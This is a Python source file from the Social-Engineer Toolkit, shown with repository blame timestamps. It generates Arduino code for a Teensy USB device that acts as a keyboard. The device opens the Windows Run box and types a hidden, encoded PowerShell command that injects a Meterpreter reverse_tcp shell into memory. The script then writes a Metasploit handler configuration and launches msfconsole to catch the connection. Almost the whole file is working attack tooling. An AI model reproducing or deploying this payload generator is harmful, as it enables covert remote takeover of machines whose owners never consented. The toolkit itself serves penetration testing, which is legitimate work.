social-engineer-toolkit/src/teensy/powershell_shellcode.py

175 lines
4.7 KiB
Python
Raw Normal View History

2012-12-31 22:11:37 +00:00
#!/usr/bin/python
import pexpect
from src.core.setcore import yesno_prompt
2013-04-15 14:26:00 +00:00
from src.core import *
2012-12-31 22:11:37 +00:00
print """
The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk.
This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html)
"""
payload = raw_input("Select payload you want to delivery via the powershell - shellcode injection\n\n1. Metasploit Meterpreter (x86)\n2. Metasploit Meterpreter (x64)\n\nEnter your choice: ")
if payload == "": payload = "2"
if payload == "1":
2013-04-15 14:26:00 +00:00
path = setdir + "/x86.powershell"
payload = "windows/meterpreter/reverse_tcp"
2012-12-31 22:11:37 +00:00
if payload == "2":
2013-04-15 14:26:00 +00:00
path = setdir + "/x64.powershell"
payload = "windows/x64/meterpreter/reverse_tcp"
2012-12-31 22:11:37 +00:00
# create base metasploit payload to pass to powershell.prep
2013-04-15 14:26:00 +00:00
filewrite = file(setdir + "/metasploit.payload", "w")
2012-12-31 22:11:37 +00:00
filewrite.write(payload)
filewrite.close()
import src.payloads.powershell.prep
fileopen = file(path, "r")
#payload_encoded = fileopen.read()
# read in x amount of bytes
data_read = int(50)
output_variable = "#include <avr/pgmspace.h>\n"
counter = 0
while 1:
reading_encoded = fileopen.read(data_read).rstrip()
if reading_encoded == "": break
output_variable += 'prog_char RevShell_%s[] PROGMEM = "%s";\n' % (counter,reading_encoded)
counter = counter + 1
2012-12-31 22:11:37 +00:00
rev_counter = 0
output_variable += "PROGMEM const char *exploit[] = {\n"
while rev_counter != counter:
output_variable+="RevShell_%s" % rev_counter
rev_counter = rev_counter +1
if rev_counter == counter:
output_variable+="};\n"
if rev_counter != counter:
output_variable+=",\n"
2012-12-31 22:11:37 +00:00
teensy = output_variable
# write the rest of the teensy code
teensy+=("""
char buffer[55];
int ledPin = 11;
void setup() {
2012-12-31 22:11:37 +00:00
pinMode(ledPin, OUTPUT);
}
void loop()
{
BlinkFast(2);
delay(5000);
CommandAtRunBar("cmd");
delay(750);
2013-07-28 14:19:32 +00:00
Keyboard.print("powershell -nop -win hidden -noni -enc ");
2012-12-31 22:11:37 +00:00
// Write the binary to the notepad file
int i;
for (i = 0; i < sizeof(exploit)/sizeof(int); i++) {
strcpy_P(buffer, (char*)pgm_read_word(&(exploit[i])));
Keyboard.print(buffer);
delay(30);
}
2012-12-31 22:11:37 +00:00
// ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST!
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
//delay(20000);
//Keyboard.println("exit");
delay(9000000);
}
void BlinkFast(int BlinkRate){
int BlinkCounter=0;
for(BlinkCounter=0; BlinkCounter!=BlinkRate; BlinkCounter++){
digitalWrite(ledPin, HIGH);
delay(80);
digitalWrite(ledPin, LOW);
delay(80);
}
}
void AltF4(){
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.set_key1(KEY_F4);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
void CtrlS(){
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.set_key1(KEY_S);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
// Taken from IronGeek
void CommandAtRunBar(char *SomeCommand){
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
2012-12-31 22:11:37 +00:00
delay(1500);
Keyboard.print(SomeCommand);
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
void PRES(int KeyCode){
Keyboard.set_key1(KeyCode);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
}
void SPRE(int KeyCode){
Keyboard.set_modifier(MODIFIERKEY_SHIFT);
Keyboard.set_key1(KeyCode);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
""")
2013-04-15 14:26:00 +00:00
print "[*] Payload has been extracted. Copying file to %s/reports/teensy.pde" % (setdir)
filewrite = file(setdir + "/reports/teensy.pde", "w")
2012-12-31 22:11:37 +00:00
filewrite.write(teensy)
filewrite.close()
choice = yesno_prompt("0","Do you want to start a listener [yes/no]: ")
if choice == "YES":
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr=raw_input(setprompt(["6"], "IP address to connect back on"))
update_options("IPADDR=" + ipaddr)
if check_options("PORT=") != 0:
port = check_options("PORT=")
else:
port = raw_input("Enter the port to connect back on: ")
2013-04-15 14:26:00 +00:00
filewrite = file(setdir + "/metasploit.answers", "w")
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset AutoRunScript post/windows/manage/smart_migrate\nexploit -j" % (payload,ipaddr,port))
filewrite.close()
print "[*] Launching Metasploit...."
try:
2013-04-15 14:26:00 +00:00
child = pexpect.spawn("msfconsole -r %s/metasploit.answers" % (setdir))
child.interact()
except: pass